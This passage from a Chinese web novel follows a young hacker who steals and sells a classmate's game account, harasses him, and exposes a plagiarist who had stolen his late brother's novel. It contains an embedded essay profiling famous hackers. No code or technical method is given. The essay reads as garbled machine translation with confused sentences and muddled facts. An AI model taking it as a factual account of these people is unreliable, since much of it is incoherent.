可是,那个伴他度过难关的朋友,却杳无音讯,萧让认为,是熊猫烧香让他失去了他的朋友,他恨透了李俊,也恨透了黑客。

危险漫步回过头,看着萧让。萧让说:“我想和你一样,成为一名黑客。我想和你一样,任意的黑——”

危险漫步猛地攥住萧让的衣领,冲着他喊道:“你以为可以肆意黑别人计算机,任意入侵别人的系统,然后在对方计算机里留下一坨屎——这他妈就是黑客了么?!这他妈很酷?你他妈什么都不懂——滚!”说完,他用力把萧让甩在地上,“我他妈不想再看到你!CNM!”

危险漫步愤怒的走出网吧,萧让的话又戳到了他从未愈合的伤口。黑客源于英文Hacker,最初泛指热爱计算机技术、计算机技术高超的人。后由于网络犯罪的出现,导致黑客在很多人眼中变成了专门攻击破坏别人计算机的人。这和最初的黑客含义相去甚远。

危险漫步拥有不凡的计算机技术,但是萧让却单纯地认为他是个只会攻击别人的网络暴力分子。

黑客拥有着黑客精神,他们善于独立思考,热爱自由,黑客精神是很多黑客成长道路上的精神支柱,那些只懂得破坏,暴力,浮夸的人群是没有黑客精神的。

每一个黑客都由道德底线,而不是被随即的欲望支配的危险分子。黑客是危险漫步的梦想,虽然生活中有不少像萧让一样的人对黑客有深深的误解,但是多年来,危险漫步还是义无反顾地坚持了下去。因为他知道,黑客是他脚下漫长的路,他将沿着这条路由黑暗走向光明。因为黑客的出现,互联网行业才会发展得那么好,黑客推动了很多网站的优化,他们带来众多发展,提供众多就业机会。

危险漫步停下脚步,抬起头看着灰蒙蒙的天空。没有飞鸟和云霞,只有一片无边无际的灰。灰色的幕,遮掩着大地。

危险漫步回过头,又走进了网吧。


 第七章  意外


柜台前的网管换成了一个漂亮的女孩,她看起来不大,眼神似乎还未脱稚气。一件很宽大的白色体恤挂在她的身上,衣摆差不多完全遮住了短裙。危险漫步扫了一眼,没发现萧让的身影,于是问女孩有没有看见刚刚吵架的人。

女孩咯咯咯地笑,说不就是你么。

危险漫步一愣,有些尴尬。女孩歪着头看他,危险漫步说:“另一个呢?”

从女孩口中,危险漫步确定萧让已经出去了。危险漫步又问了他的一些其他情况,像是他在古店中学几班,住哪里之类,可惜,女孩都不知道。

危险漫步道声谢谢,坐到萧让刚刚坐的电脑上,获取上一个用户信息。危险漫步先查询出萧让刚刚玩的游戏,然后破解其账号密码。最后,他再次拨通林雨生的电话。

“我现在给你一个DNF的号,你上一下,看一下他的装备,然后帮我卖了。”

除了DNF,萧让就是听音乐。危险漫步看了下播放列表,发现有几首自己也比较喜欢。他戴上耳机,林雨生的电话来得比想象中的还要快。

林雨生激动地说:“你是从哪儿弄到这个号的?卖了可惜啊,自己留着吧!”

危险漫步:“继续。”

林雨生:“等级虽然不是特别高,但是号里面装备特别多,叠加算,好几万是肯定的。如果你不着急,挂网上慢慢等买主,五万没问题。”

危险漫步:“如果着急呢?”

林雨生:“越急着出手价格肯定就越低,但是资本摆在那儿,也不会跌太惨。”

危险漫步:“那交给你去办,我给你三天,你把号处理掉,免得生是非。然后你打我一万,余下的都你留着。晚一点的时候,我会把新密码发给你。”

危险漫步走出网吧的时候,外面已经下起雨来。霓虹灯照得眼前落下的雨珠五彩斑斓,危险漫步叹了口气,正准备走,网吧的门又被打开。女孩手里拿着把伞,递给危险漫步。

危险漫步摇摇头,说不喜欢打伞,他把兜帽戴上,消失在了雨幕里。夏末的雨飘了一周,放晴后,天空变得格外明朗。

危险漫步盗取了学校信息档案,经常给萧让制造麻烦。老师在讲台前用多媒体放视频资料,弹出的却是不堪入目的色情画面。有时,视频里的男主被PS成了萧让,有时干脆在视频底部加一行醒目的字:赠予大家最真挚的礼物。

或者,萧让家里的电脑不听自己使唤,父母用的电脑却没有什么异常。

萧让清楚这是危险漫步搞的鬼,但他并没有去找危险漫步算账,而是默默承受下这一切。

傍晚,危险漫步从后街回到住所,半路上,他看见了来古店第一天时在网吧遇见的那伙人。为首的五花六道男的头发,已经换了另一种颜色,但依然五花六道。他叼着烟,手里拿着一只空酒瓶。身后的人呈一字排开,标配的啤酒瓶,白青都有,牌子各不相同。

“我该夸你高科技呢,还是判你作弊呢?”五花六道男冷笑着往前走。危险漫步回过头,巷尾又有两个人向他迎来。危险漫步四周看了看,突然向前奔跑,这个举动倒是把五花六道男吓了一跳,但他很快反过来,自己人多势众,没必要怕他孤身一人。

五花六道男酒瓶一挥,“上。”

窄巷里响起参差不齐的冲叫声。危险漫步并不为所动,继续向前奔跑,他很快奔到众人眼前,第一排的人已经劈下了手里酒瓶。危险漫步一闪,跨到一边,一脚蹬在墙底废弃的洗衣机上。他在洗衣机上蹲下,又迅速地弹起,像一只青蛙飞向墙面。危险漫步在墙上重重地踩了一脚,身体腾空转半圈,两只手迅速扒住身后突出的屋檐。

一个引体向上,一个翻身,青蛙又变成里猿猴,不过,都是一样的敏捷。

众人愣愣地仰视着危险漫步,不过眨眼功夫,他就飞到了屋顶。五花六道男气急败坏地指挥身边的光头男上屋顶。可惜,让危险漫步跳到屋顶上,再想捉住他,可就没那么容易了。他越过几间平屋,跳进大街,借着暮色沉沉,很快消失在人海里。

可惜一群人有如疯狗一般地缠绕,危险漫步甩过五次,但是他们依然不肯放弃。一次,危险漫步回住所,进里公寓大门后察觉后门有人跟踪。他回过身,退了几步,大声叫他们出来。

危险漫步:“你们想要怎样?我对躲猫猫游戏并不感兴趣。”

五花六道男从阴影里走出来,身后呼啦啦露出众人。标配的啤酒瓶,没太多新意。

五花六道男笑,“别那么严肃。我来找你,也是理所当然。上次我们在飞跃比赛,你靠作弊赢了我。我——我们要么光明正大地再比一次,要么,作弊零分处理,那你输咯。”

危险漫步的脸多半在兜帽的阴影里,昏暗的灯光下难以看清他的表情。危险漫步:“不好意思,我没兴趣。”

五花六道男嬉笑着,“你有没有兴趣,都没有关系,如果你执意放弃,那只要把彩金补上就好了。” 

危险漫步摇头,五花六道男笑还未说话,一旁的光头男冲了出来,扯着嘶哑的嗓子叫道:“一场比赛,我们也并不介意,不过,我手里的瓶子很介意呢。”

这个冷笑话,还真是有够难笑呢。危险漫步讽刺说,他也不介意,不过,希望工程很介意。

光头男恼羞成怒,率先冲了过去。危险漫步胳膊一抖,袖口滑出了一根警棍……

萧让走进公寓的院子时,危险漫步和混混一群人打得正激烈。他们显然没想过危险漫步会反抗,准备的并不充分,除了标配的啤酒瓶,就剩生来就有的拳头了。危险漫步的警棍可以拉长,酒瓶属近身攻击,而且是一次性使用,虽然混混人多,却并不占优势。为了防止被碎酒瓶伤到,危险漫步打碎酒瓶后一般都会进一步追击,狠狠一棍重击其手上,混混们的半截酒瓶随之脱手。

随着体力不止,危险漫步身上开始挂彩,天空响起一阵闷雷,又要下雨了。

混混的后方响起一阵骚动,危险漫步不清楚怎么回事,四周的人却不给他一看究竟的机会。过了一会儿,危险漫步才从破碎的语句中明白,后面又有个人打了进来。

会是谁呢?在古店,危险漫步没有亲戚朋友,如果来的是警察,他倒不会意外。不过,如果来的是警察,这些人应该会作鸟兽散才对。两人前后夹击,混混们竟然有些吵架不住。起先围攻危险漫步,他们围成一圈,还算有秩序,此刻腹背受敌,人群变得混乱不堪,人心涣散,只有光头和五花六道男还带着气势。

又是一声雷响,大雨随之铺天盖地。

五花六道男立起的头发被雨点打趴,他的气势也随之消散。他高高举起了他的酒瓶,呼唤众人撤退。从后面打过来的人站在路的中间,撤退的混混们很有默契地从他身边绕过,像河水绕过河道间的巨石。

巨石慢慢向前移动,走到危险漫步的身边,雨水冲散地上的血迹,破碎的酒瓶缓缓向下水道处移动。公寓院墙壁悬挂的灯泡光线暗淡,危险漫步冻得浑身发抖,他像在自言自语,又像和迎面走来的人说,下雨,和打架有什么关系呢?回家,收被子么?

那人手里的自行车锁咣当一声掉在地上,他摘帽子,道:“是啊,所谓‘笨蛋虽笨,但是还有比他更笨的笨蛋在为他喝彩。’”

危险漫步看着他,惊讶地问:“萧让?你来这里做什么?为什么帮我?”

萧让:“我住这里,有哪里不对么?”

危险漫步怫然道:“你跟踪我?”

萧让:“所以你体会到了,被人跟踪的滋味了?”

危险漫步:“我跟踪你?你仿佛在说一个冷笑话。我建议你去找混混的啤酒瓶敲一下脑袋,那样你的大脑因该会清醒些。”

萧让:“你在网络上,像狗皮膏药地一样粘着我。如果这不算跟踪的话,你可以在这与雨下站一夜,我想这样你的大脑也会清醒些。”萧让走到墙角,锁好车,往公寓里走。与危险漫步擦身而过的时候,危险漫步拦住了他。

危险漫步:“你知道他们围攻的是我——你知道,还有,回答我的问题,为什么帮我。”

萧让:“第一点很容易推出。至于第二点么,你四处入侵别人的计算机,入侵系统,破坏,接着给他人的生活造成困扰,我刚买的DNF号果不其然地被你拿去卖了——你终于活成了你最憎恨的那种人。如果危险漫步能在天有灵,是否会觉得宽慰呢?”

闪电划破漆黑的夜空,雨幕惨白一片,又重归黑夜。雷声紧随其后。


第八章  初衷


世纪末的烟火,照耀着人们脸上喜悦的笑容。陆家却在这片欢闹中搬到了十多里以外的县上。故乡对他们来说,不过是座悲伤的城市。

危险漫步是个缄默的人,他兴趣不多,但是对文学和计算机的热爱却超越了他认识的所有人。他身材很高,偏瘦,带着一副眼镜,斯斯文文的样子,除了弟弟,他很少与人交谈。危险漫步小时候最喜欢的事,就是做在哥哥的腿上,听哥哥说一些计算机方面的事,从最基础的鼠标键盘,再到网络,系统,渗透,暗网。

危险漫步总是似懂非懂,不过,他很乐意听哥哥说这些。危险漫步对计算机的兴趣促使他在网络世界不断探索,而他真正的愿望却是一个做一个小说家。

他告诉危险漫步,他要创造一个个人物,并赐予他们灵魂。

哥哥写作的时候,危险漫步一般不去打扰,他会翻阅字典,以便可以早些读到哥哥的作品。偶尔,他坐在哥哥的身边,看哥哥敲打电脑,然后屏幕上显现漂亮的字符。

哥哥遇到瓶颈的时候,就会跟危险漫步讲他写得故事。危险漫步写的是一部推理小说,他认为中国的推理小说写得很糟糕,糟糕之处不仅仅是作家笔下蹩脚的剧情,呆头呆脑的侦探。最大的败笔,在于诸多作品分不清推理、悬疑、惊悚、灵异、恐怖的区别,有的小说封面打的标语是“推理悬疑”,蹩脚侦探三流小说家忙乎了数十万字,最后凶手莫名奇妙落网,解释不通的地方用鬼怪、灵异事件遮掩。

中国的推理小说,严格意义上没有几本。危险漫步想要做的,就是完成一部,逻辑性强,公平的推理小说。为了防止自己在最后陷入种种的不公平与不合理,危险漫步选择了密室推理,并且设计了一种全新的手法。

这篇小说已经写了九个月,除了结尾,全部完成。但是危险漫步已经将结尾搁置两个月了,他做到了剧情和各方面的公正,最后凶手被揭穿,危险漫步却欠他一个公平。

蓄意杀人类犯罪,一般有情杀,仇杀,钱杀,任务等。

钱杀。若是为了满足一己的私欲(如赌博,吸毒)谋财害命,那不必多说,如果是迫不得已呢?冉阿让身陷囹圄,只因为偷了一块面包给姐姐的孩子。身强力壮又无恶习的他找不到足以养家糊口的工作,他如果不偷,姐姐的孩子就会饿死。有一门宗教里规定,家里没有粮食出去偷吃的,偷窃者无罪。当然咯,为钱杀人,哪怕是救人,总归害死了生命,终究难以饶恕的。

情杀和仇杀相近,同有报复属性。假设A曾经杀害了B的情人或者亲友C,A又依靠各种能力巧妙地躲过了法律的制裁,那么B是多么的绝望,A又是多么的可恶!当法律无法制裁A,那么,B只能依靠自己的力量制裁A。这是一种复仇,这是一种犯罪,然而对于B来说,这又是唯一的,制裁A的方法。所以,B最后杀了A,为C找回公道。B成了凶手,法律为A找回公道,制裁了B,谁再为B找回公道呢?从汉谟拉比法典到当今的法律,以眼还眼以牙还牙,杀人偿命。法律的子弹穿透B的头颅,ABC三人间的天平,绝对是倾斜的。

把B放走?更不可能。危险漫步遇到了前所未有的困难。

路过书店,危险漫步走进去瞧了瞧。推理一栏出现了不少新书,一本书的书腰引起了危险漫步的注意:新人力作,划开中国推理小说届的新时代。

书名是《罪惟录》,作者是一个叫江新的人。

打开一看,危险漫步的脑子里响起了一声惊雷。这就是他在写的那本小说,里面的角色是不过换了名字,其他全部一样!

危险漫步匆匆回到家里,打开电脑,小说的文档不翼而飞。危险漫步感到天旋地转,他没想到自己做了几个月的肉鸡,并且毫无察觉。

抄袭的书的结尾,子弹穿透了凶手的胸膛,它也打破了危险漫步的理想。

人们从井里把他捞出来的时候,他已经断气多时了。

冬日的黄昏又冷有短暂,晚霞火烧云很难见到。两三点过后,太阳吝啬地收起他温暖的光芒,至四点,天色渐暗。

起初,是很难察觉的,光线收得缓慢,等你意识到天晚的时候,你的面前已经被安放了一面无形的茶玻璃。

玻璃一面接着一面,能见度越来越低。它终于从你面前撤走了,此刻的世界却已经是一片黑暗了。

危险漫步回头看了一眼即将离开的城市,他的命运,就此改变。十岁前,危险漫步为两件事而忙碌,一是学习计算机技术,二是回忆哥哥对他说的关于小说的每一句话。虽然哥哥写作是在电脑上完成,文档也被删除,但是书里很多细节、构思与立意都是和危险漫步息息相关的,有些段落,有些名词、引用,为何出现,只有危险漫步和危险漫步知道。十岁的时候,他终于把足以让江新身败名裂的资料整好,望着面前厚厚的一沓证据,危险漫步却改变了主意。

危险漫步入侵了江新的电脑,想看看他有没有犯罪的证据。当初这只是灵光一现的念头,危险漫步从未想过可以在江新的电脑里发现众多秘密。

五年后,中国几大新闻网遭受匿名黑客攻击,新闻网首页爆料了江新众多令人发指的罪恶勾当,如从别人电脑里偷走稿件,只修改姓名是他早期不成熟的做法,老奸巨猾的他后来给盗取到的作品加以润色,摇身一变,印成铅字全都署上了他的名字。

如果被他发现了重要隐私,那么他就会对当事人进行勒索,人们看了匿名黑客的爆料,才知道两年前轰动一时的K大大学生连续自杀案罪魁祸首是每年拿着数百万稿费江新!

页面底端,附着一篇江新日记,里面以肉麻的口吻自身了窃取、勒索过程中的快感。 

江新锒铛入狱,两个月后于狱中自杀。那位匿名的黑客,网站却查不到他的踪迹,几大新闻网请来的黑客,沿着蛛丝马迹找到的地址都指向一个方向——江新的家。

匿名黑客不用说就是危险漫步了。他站在防波堤上,眼前横流的沧海,猛烈地撞击着脚下的堤石。危险漫步扬起数十年来积攒的证据和回忆,放它去想去的世界。

危险漫步的面颊上涌起一片潮湿。

危险漫步抹了一把脸上的雨水,愤怒地说,“你没有资格提起我的哥哥。”说完,重重的一拳砸在了萧让的脸上。

萧让并不躲闪,脑袋歪向一边。“你又有什么资格命令我?凭你无尽的破坏么?”

他一个绊腿,追击一肘,将危险漫步撂倒在地。

雷声滚滚,雨越下雨大。

危险漫步躺在地上,无力起身。萧让揪住他的衣领,把他像死狗一样拖起来。危险漫步长长的头发,被雨水淋得散乱,两只胳膊无力地下垂,指尖的水延成小小的线,在地上消失无踪。

危险漫步喃喃地说:“恪守黑客道德,顽强正值,对信念坚定不移:捍卫国家网络安全和信息安全。这样的人,才有资格被称为黑客。高手,不仅仅指武功高强的人,杀人如麻者,只能称为疯子………”

遥远的清晨,他坐在哥哥身旁。晨光略有些刺眼,危险漫步兴奋的告诉他,结尾有头绪了。

“其实,所谓的人生价值,并不一定由怎样活着决定。我甚至觉得,怎么死,才是最重要的。”

危险漫步笑眯眯的摸着弟弟的头发,觉得现在和弟弟说这些太早了点。他告诉弟弟,结尾已经想好了,回来马上补上。

只是,那个清晨,危险漫步还不知道,他笔下的凶手,已经毫无意义地死去了。最后,他设定的方案,却留给了自己。

两行热泪混杂着冰冷的雨水,“每个人都活在自我的认知里,它带着人一路狂奔,认知又是暧昧不清的,他予人羁绊,最后我们,全都活在梦里。你大可雇佣高手窃盗玩笑的QQ,分析情况。但你没有,因为你清楚,他不可能忘记自己的QQ密码。你在期待着什么,似幻似真的梦境么。”

胸口的束缚松掉了。危险漫步坠入雨地里,在滂沱的雨声里,悄然无息。


 第九章  汪青蓝(三)


2003年,汪青蓝的家里买了一部手机,它像座机一样属于家里的每一名成员,有时候汪青蓝父亲出门带着,有时候汪青蓝母亲出门带着。汪青蓝不享有带它出门的权力,如果父母高兴,他可以拿它过来玩手机游戏。

随着手机的普及化,座机逐渐被家庭所淘汰。如果不是汪青蓝的母亲经常擦拭,它大概会落满灰尘。汪青蓝愣愣地盯着它,红色的塑料已经有些褪色,每个数字键都带有不同程度的磨损。

家里刚买这台电话的时候,汪青蓝只能站在父母的床头柜前,吃力地按着按钮,现在,他坐在父母的床边,俯视这台已有十年的电话。

它突然响了,很急促。汪青蓝不记得它有多久没响了,他有些犹疑。

电话那边是危险漫步。

他的声音听起来很陌生,虽然,他也同样这么说汪青蓝。汪青蓝告诉他,运气不错,如果再玩打一个星期,就打不通了。届时汪青蓝家换宽带,决定拆机不用固话了。

危险漫步说,没事,即便这个号不存在,他依然能找到他。汪青蓝一时语塞,竟无言以对。

危险漫步把一个网站交给汪青蓝打理,他暂时没有太多的时间。网站的名字叫危险漫步,准确的说因该是个博客,博客里多是关于黑客的一些比较私人的日记,记录了好几年来他上网时候遇到的很多事,或者学习计算机途中的一些心得。很多浏览过的朋友也会试着写一些关于黑客技术之类的文章给危险漫步,危险漫步有时选择些好的发在博客上。

很快,汪青蓝的邮箱里收到了危险漫步发的两封邮件,第一封里写了网站的网址、后台网址以及相关的设置操作方法。危险漫步告诉汪青蓝,如果有兴趣可以看着网站里的文章进行一些自学。长风破浪会有时,直挂云帆济沧海。

第二封信是危险漫步写的一篇文章,他简单地和汪青蓝介绍了世界顶级的几大黑客。

黑客在媒体的描述下变成了高科技间谍,如碟中谍哪里伊森·亨特从天花板破解中情局电脑系统,窃取了排斥“NOC名单。或者一个孤独的社会青年整天闷在自己的卧室编写这属于自己的程序代码,自娱自乐。

然而事实是,黑客是一个非常多元化的一群,一组造成数十亿美元的赔偿金以及与万维网的发展和重大科技公司成立贷记同时指责。其实无论是邪恶的英雄,还是白帽侠客都是这个行业的英雄。

凯文·米特尼克:一名自称“黑客海报男孩”,米特尼克通过当局大张旗鼓地宣传追求去了。他的恶作剧被媒体大肆炒作,但他的实际罪行可能比他的恶名建议。少值得注意司法部将他描述为“最想要的计算机犯罪在美国的历史。” 自由停机和卷布:他的功绩在两部电影中详细说明。

米特尼克有一点经验的黑客犯下使他成名的罪行之前。他一开始破解了洛杉矶公交车打卡系统,以获得免费乘车。然后,像苹果联合创始人史蒂夫·沃兹尼亚克,涉足手机盗用。尽管纷纷扬扬的罪行,米特尼克最终被定罪闯入Digital Equipment公司的计算机网络并窃取软件。

当他在两年半的一年过去了米特尼克的恶作剧了严重的“黑客大礼包海岸到海岸”。CNN的文章,“ 传说中的电脑黑客从监狱中释放,”解释说,“他侵入计算机,窃取公司机密,扰乱电话网络,并闯进了国防预警系统。” 然后,他侵入电脑专家和黑客伙伴下村努的家用电脑,这导致了他的垮台。

如今,米特尼克已能搬过去他作为一个黑帽子黑客作用,并成为社会有益的一员。他担任五年中,约8个月的它单独监禁,现在是一个计算机安全顾问,作家和演说家。

乔纳森·詹姆斯:詹姆斯得到了恶名,当他成为了第一个少年被送进监狱黑客。他在16岁那年被判刑。在匿名PBS采访时,他自称,“我只是环顾四周,玩了什么是有趣的,我是要看看我能拉过一个挑战。”

詹姆斯的主要入侵有针对性的高调组织。他安装了一个后门程序到国防威胁降低局的服务器。该DTRA是国防部的一个机构负责减少对美国和核,生物,化学,常规和特殊武器及其盟友的威胁。他创建的后门让他查看敏感的电子邮件和捕捉员工的用户名和密码。

詹姆斯也裂解成NASA的计算机,窃取软件价值约1.7亿$。根据司法部“,该软件支持国际空间站的物理环境,包括居住空间内的温度和湿度的控制权。” 美国航空航天局被迫关闭其计算机系统,最终费尽了一个$ 41,000名成本。詹姆斯解释说,他下载的代码来补充他的C编程研究,但辩称,“代码本身是蹩脚的。当然不值得$ 170万像他们声称。”

鉴于他侵入的程度,如果詹姆斯,也被称为“c0mrade,”已经成年,他可能会担任至少10年。相反,他是从娱乐性电脑使用禁止,被提名担任为期六个月的判决软禁缓刑。不过,他服刑6个月的监禁违反假释。今天,詹姆斯称,他吸取了教训,并可能启动计算机安全公司。

阿德里安拉莫:落漠的声名鹊起的是他的入室在诸如纽约时报和微软的主要组织。被称为“无家可归的黑客”,他用在Kinko的互联网连接,咖啡馆和图书馆做他的入侵。在配置文件中的文章,“ 他用黑客日,夜蹲 ”,落漠反映,“我在匹兹堡一台笔记本电脑,衣服直流改变它种重新定义的术语多个司法管辖区。”

落漠的入侵主要包括渗透测试,他在其中找到漏洞在安全,剥削他们,然后告诉自己的缺点的公司。他的命中包括雅虎美国银行,花旗集团和Cingular。当白帽子黑客由公司聘请做渗透测试,这是合法的。什么落漠所做的是不是。

当他闯入纽约时报“内联网,事情变得严重。他说自己的专家名单,并认为对贡献者的个人信息,包括社会安全号码。拉莫还侵入时报“LexisNexis公司占研究高调的主题。

对于他在纽约时报的入侵,落漠被勒令支付大约$ 65,000的赔偿金。他也被判处了六个月的家庭监禁和两年缓刑,这已过期1月16日,2007年落漠目前正作为一个屡获殊荣的记者和公众演讲。

凯文·波尔森:也称为黑暗但丁,波尔森获得表彰他的洛杉矶电台的KIIS-FM电话线的黑客,这为他赢得了在其他项目中一个全新的保时捷。执法戏称他为“计算机犯罪的汉尼拔”。

当局开始追求波尔森后,他入侵了一个联邦调查数据库。在这种追求,他进一步侵入窃听的联邦信息电脑引起了联邦调查局的愤怒。

他的专业黑客,但是,围绕着电话。波尔森最著名的黑客,KIIS-FM,被接管所有站的电话线来完成。在相关的壮举,也波尔森“一个熟人谁然后跑一个虚拟的护送机构重新激活黄页上保驾护航的电话号码。” 后来,当他的照片来了个节目未解之谜,程序1-800电话线坠毁。最终,波尔森在一家超市被抓获并担任五年的句子。

由于上菜的时候,鲍尔森曾担任记者。他现在是Wired News的高级编辑。他最突出的文章详细介绍识别与MySpace资料744性罪犯他的工作。

罗伯特·塔潘·莫里斯:莫里斯,前国家安全局的一名科学家罗伯特莫里斯的儿子,被称为的创造者莫里斯蠕虫,第一台计算机蠕虫在互联网上释放。作为本罪的结果,他是在1986年计算机欺诈起诉的第一人,并滥用法案。

莫里斯写的代码的蠕虫病毒,而他是一名学生在康奈尔大学。他声称,他打算用它来上网看看有多大了。该蠕虫病毒,然而,复制本身过度,电脑放缓下来,让他们不再使用。这是不可能知道的许多电脑被究竟是如何受到影响,但专家估计6000机的影响。他被判处三年缓刑,400个小时的社区服务和罚款一10,500$。

莫里斯目前正为在麻省理工学院计算机科学和人工智能实验室的教授。他主要研究计算机网络体系结构,包括分布式哈希表,如和弦和无线网状网络,如Roofnet。

危险漫步又列了五名白帽黑客,这些白色的帽子经常工作获得认证等“道德黑客”,由公司聘请去测试他们的系统的完整性。其他的,没有公司的许可经营弯曲但不能违反法律,并在过程中创造了一些非常酷的东西

斯蒂芬·沃兹尼亚克:“沃兹”是著名的“其他史蒂夫”苹果。沃兹尼亚克,与目前的苹果CEO史蒂夫·乔布斯一起,共同创立了苹果电脑公司。他曾荣获国家技术奖章,以及从凯特林大学和诺瓦东南大学的荣誉博士学位。此外,沃兹被入选全国发明家名人堂于2000年9月。

沃兹在黑客制作蓝盒子,绕过电话交换机制进行免费的长途通话的设备开始了他。阅读关于手机君子的盗用文章之后,沃兹尼亚克召入他的好友作业。这对做研究的频率,然后建造和售出大学蓝盒子给他们的同学。沃兹尼亚克甚至用一个蓝色的盒子叫教皇而假装是亨利·基辛格。

沃兹尼亚克从大学辍学,并最终使他成名的计算机上来。乔布斯有了好主意,以计算机销售为完全组装的PC板。在史蒂夫·沃兹尼亚克卖掉的珍贵的科学计算器和乔布斯的大众面包车资本和开始工作在乔布斯组装原型的车库。沃兹尼亚克设计的硬件和大多数软件。在信件 Woz.org的部分,他回忆说做“什么爱德·罗伯茨和比尔·盖茨和保罗·艾伦没有和吨以上,没有帮助。” 沃兹尼亚克和乔布斯卖苹果我的第一个100到当地的经销商为每个666.66 $。

沃兹不再全职工作为苹果,主要侧重于慈善事业,而不是。最引人注目的是他作为童话教父到加州Los Gatos。学区的功能。“沃兹尼亚克' 采取 '洛斯加托斯学区,提供与学生和老师手把手的教和国家的最先进的技术设备捐赠。”

蒂姆·伯纳斯-李:伯纳斯-李是著名的万维网的发明者,我们用它来访问网站,文档和文件在互联网上的系统。他曾获得无数赞誉,其中最著名的是千年科技奖。

当一名学生在牛津大学,伯纳斯-李被抓获黑客和一位朋友的访问和随后从大学计算机取缔。w3.org报道,“虽然[牛津],他建立了自己的第一台电脑用烙铁,TTL门,一个M6800处理器和旧电视。“ 技术创新似乎已经在他的基因中运行,因为伯纳斯-李的父母是数学家谁在曼彻斯特标志1,最早的电子计算机的一个工作。

虽然与CERN,一个欧洲核子研究组织工作,伯纳斯-李创建了一个超文本原型系统,帮助研究人员共享,轻松地更新信息。后来他意识到,超文本可以与互联网进行连接。伯纳斯-李重新计数他是如何把它们放在一起:“我只是不得不采取超文本理念,并将其连接到TCP和DNS的想法和-当当-万维网”。

由于他创作的万维网,伯纳斯 - 李在麻省理工学院创立了万维网联盟。W3C的把自己描述为“一个国际联盟机构,会员,有专职工作人员和公众携手合作开发Web标准。” 伯纳斯 - 李的万维网的想法,以及来自W3C的标准,不带任何专利或特许由于自由发布。

Linus Torvalds公司:Torvalds的父亲Linux中,非常流行的基于Unix的操作系统。他自称“工程师”,并说他的诉求很简单,“我只是想有乐趣使最该死的操作系统,我可以。”

托沃兹在一台Commodore VIC-20,8位家用电脑电脑开始了他。然后,他转移到一个辛克莱QL。维基百科报道,他修改了辛克莱“广泛应用,尤其是它的操作系统。” 具体来说,Torvalds的黑客列入“汇编和一个文本编辑器...还有几场比赛。”

托沃兹创建Linux内核在1991年,使用的Minix操作系统作为灵感。他开始在英特尔公司的80386组装一个任务切换和终端驱动程序。之后,他又推出了一个电话给别人贡献代码,他们照办了。目前,只有大约2当前的Linux内核的百分比由Torvalds本人写的。该公开招标的成功为Linux吹捧为的免费/开放源码软件最突出的例子之一贡献代码,

目前,托沃兹作为Linux的魁首,协调的代码,程序员志愿者贡献内核。他有他的名字命名一颗小行星,距离斯德哥尔摩大学和芬兰赫尔辛基大学接受荣誉博士学位。他还发表在时代杂志的“ 60年的英雄。”

理查德·斯托曼:Stallman的名气来自GNU计划,他致力于开发一个免费的操作系统派生的。为此,他被称为自由软件之父。他的“ 严重的生物 ”断言,“非自由软件用户不断分裂和无奈,禁止共享,无法改变它。一个免费的操作系统是必不可少的人们能够自由使用的电脑。”

斯托曼,谁喜欢被称为有效值,开始了他在麻省理工学院的黑客。他担任“参谋黑客”在Emacs的项目和其他项目。他是在实验室限制计算机的访问评论家。当安装了密码系统,打破了斯托尔曼下来,重置密码为空字符串,然后送到用户的邮件,通知他们取消密码体系。

开始与打印机Stallman的讨伐的免费软件。在麻省理工学院的实验室里,他和其他黑客被允许的打印机修改代码,以便他们送方便警报消息。然而,一个新的打印机来了 - 一个他们不允许修改。它位于从实验室走,并没有警报呈现的不便。正是在这一点上,他“相信...的道德必要规定的免费软件。”

有了这个灵感,他开始在GNU的工作。斯托曼写了一篇文章,“ GNU工程 ”,在其中他回忆道选择一个操作系统上工作,因为它是一个基础,“使用计算机的关键软件。” 此时,所述的GNU / Linux版本的操作系统的使用Linux内核由Torvalds的启动。GNU下散发“copyleft的”,它采用版权法,允许用户使用,修改,复制和分发软件的方法。

Stallman的生活继续围绕促进自由软件。他的作品像反对数字版权管理运动(或他更喜欢数字限制管理)通过像自由软件基金会和团组织自由编程。他受到了广泛的认可,他的工作,包括奖励,奖学金和四个荣誉博士学位。

下村努:下村在一个不幸的方式达到成名:他被凯文·米特尼克黑客攻击。在此之后的个人进攻,他使得他的事业帮助FBI抓住他。

下村的工作,赶米特尼克是值得称道的,但他也不是没有自己的阴暗面。作者布鲁斯·斯特林回忆道: “他翻出这AT&T的手机,翻出它的拆封,指黑客它,并开始监控电话上上下下国会山而一个FBI探员正站在他的肩膀,听他的。 “

发现关于入侵后不久,他召集一队,并开始工作发现米特尼克。使用米特尼克的手机,他们找到了他近罗利-达勒姆国际机场。文章“ SDSC计算机专家帮助FBI捕获计算机恐怖分子 ”讲述如何下村精确定位米特尼克的位置。从电话公司技术人员的武装,下村“使用迷上了一台笔记本电脑蜂窝频率测向天线以缩小搜索的公寓。” 米特尼克此后不久被警方抓获。继追求,下村写了一本有关这一事件与记者约翰·马科夫,后来拍成电影。

汪青蓝回了一封邮件,不过只有短短OK两个字母。对于危险漫步,汪青蓝一如既往的信任。从什么时候开始呢,脑子里突然冒出这个问题,或许,是从学校的商店被盗一事开始。

学前班开学不久,学校发生了一件“大事”——校园里的商店门被撬开,被偷走了很多零食。校长听闻此时后非常震怒,下令各个年级的老师查看怎么回事。迟语在将台前,思想教育半天,除了主动传承认既往不咎没有别的意思。迟语的思想教育并不走心,全校六个班,他班里的学生最小,因此,她并不觉得商店遭窃一事与她的学生有关。危险漫步合上书,思考了一会儿,和迟语打声招呼,走出教室。

危险漫步建议迟语一个一个询问班里学生,问题如下“是否有平日不买零食的人,今天请你吃零食?”

危险漫步认为高年级学生在学校经历多年,大事小事都已习惯,不见得会做出这种傻事。既然是变动,那么只有两个年级的学生最为可疑:学前班和一年级。学前班刚入学,自身还处于不稳定状态,加之年幼胆小,所以也不符合这一条件。

嫌疑最大的便是一年级的学生,他们经历了由学前班——一年级的飞跃,从垫底到有人替垫底,心智不成熟,突然又有了高高在上的姿态,所以,危险漫步认为一年级学生嫌疑最大。

迟语冷冷地看着危险漫步,思考危险漫步话的住准确性。过了一会儿,她终于做出决定——搜索危险漫步的桌肚。这一举动惹得危险漫步非常恼火,但他并没有抗议,在迟语做出决定的一瞬间,他便做好看校长批评她的笑话了。

学校几个老师联合起来想办法,终于在这一天将要结束的时候揪出了罪魁祸首,如危险漫步所料,是一年级的学生。

这件事结束后,迟语非但没信任危险漫步,反而更与他疏远,人性卑劣可见于此。

不过,危险漫步也丝毫不在意迟语和他的关系,自那只后,他与汪青蓝的关系倒是更上一层楼。


第十章  古店(二) 


危险漫步醒来的时候,周围一片雪白。秋天的温度不低,房间里却充斥着干燥的温暖。
